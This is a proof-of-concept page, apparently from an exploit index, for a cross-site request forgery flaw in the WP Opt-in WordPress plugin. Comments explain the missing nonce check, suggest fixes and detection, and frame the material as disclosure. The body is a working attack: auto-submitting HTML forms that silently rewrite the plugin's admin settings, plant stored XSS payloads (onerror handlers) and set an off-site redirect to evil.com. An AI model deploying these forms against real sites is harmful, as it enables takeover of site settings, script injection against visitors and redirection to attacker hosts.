## https://sploitus.com/exploit?id=WPEX-ID:46B634F6-92BC-4E00-A4C0-C25135C61922
<!--
  Proof of concept for cross-site request forgery (CSRF) against the settings
  page of the WordPress plugin addressed by page=wp-opt-in/wp-opt-in.php.

  The form carries only wpoi_* fields and a Submit field. No per-session nonce
  is included, so any third-party page can build this request and the browser
  sends it with the logged-in administrator's cookies. That it is listed as
  working implies the save handler does not verify a nonce.

  Fix in the plugin: emit wp_nonce_field() in the settings form and call
  check_admin_referer() plus current_user_can( 'manage_options' ) before any
  option is written.

  Detection: POSTs to this admin URL whose Origin or Referer is not the site
  itself, and unexpected changes to the plugin's stored messages, mail
  settings or redirect URL.
-->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-opt-in%2Fwp-opt-in.php" method="POST">
    <!-- Static value; presumably the marker the handler checks to recognise a
         submitted form (not confirmed on this page). A constant like this is
         not a CSRF token. -->
    <input type="text" name="wpoi_hidden" value="SAb13c">
    <!-- Mail sender, subject, body and notify address all become
         attacker-chosen once the request is accepted. -->
    <input type="text" name="wpoi_email_from" value="test@example.com">
    <input type="text" name="wpoi_email_subject" value="[example.com] Requested e-mail">
    <input type="text" name="wpoi_email_message" value="hacked">
    <input type="text" name="wpoi_email_notify" value="">
    <input type="text" name="wpoi_msg_bad" value="<p><b>Bad e-mail address.</b></p>">
    <input type="text" name="wpoi_msg_fail" value="<p><b>Failed sending to e-mail address.</b></p>">
    <!-- The next two values hold markup with an inline event handler; alert(1)
         is a harmless execution marker. If the plugin stores them and prints
         them unescaped, the CSRF turns into stored XSS. Sanitize on save
         (for example wp_kses_post()) and escape on output. -->
    <input type="text" name="wpoi_msg_sent" value="<img src=x onerror=alert(1)>">
    <input type="text" name="wpoi_form_header" value="<img src=x onerror=alert(1)>">
    <input type="text" name="wpoi_form_footer" value="</div>">
    <input type="text" name="wpoi_form_email" value="E-mail:">
    <input type="text" name="wpoi_form_send" value="Submit">
    <!-- Off-site redirect target. Validate on save (esc_url_raw()) and redirect
         with wp_safe_redirect() so hosts outside the allowed list are refused. -->
    <input type="text" name="wpoi_url_redir" value="https://evil.com">
    <input type="text" name="Submit" value="Update Options ยป">
</form>
<!-- The form is submitted as soon as the page loads, so the request needs no
     click from the administrator; this is why a server-side nonce check is the
     control that matters here. -->
<script>
    document.getElementById("test").submit();
</script>


<!--
  Second snippet from the same page. It POSTs only wpoi_email to a front-end
  URL and auto-submits on load. Presumably this exercises the plugin's public
  opt-in form so that the values stored by the settings request (result
  message, redirect URL) are rendered to the visitor; the page does not state
  this, so confirm against the plugin code.

  Defensive reading: every stored setting that reaches this response must be
  escaped for its output context (esc_html(), esc_attr()), and any redirect
  must be restricted to the site's own hosts.
-->
<form id="test" action="https://example.com/asasas" method="POST">
    <input type="text" name="wpoi_email" value="test@example.com">
</form>
<script>
    document.getElementById("test").submit();
</script>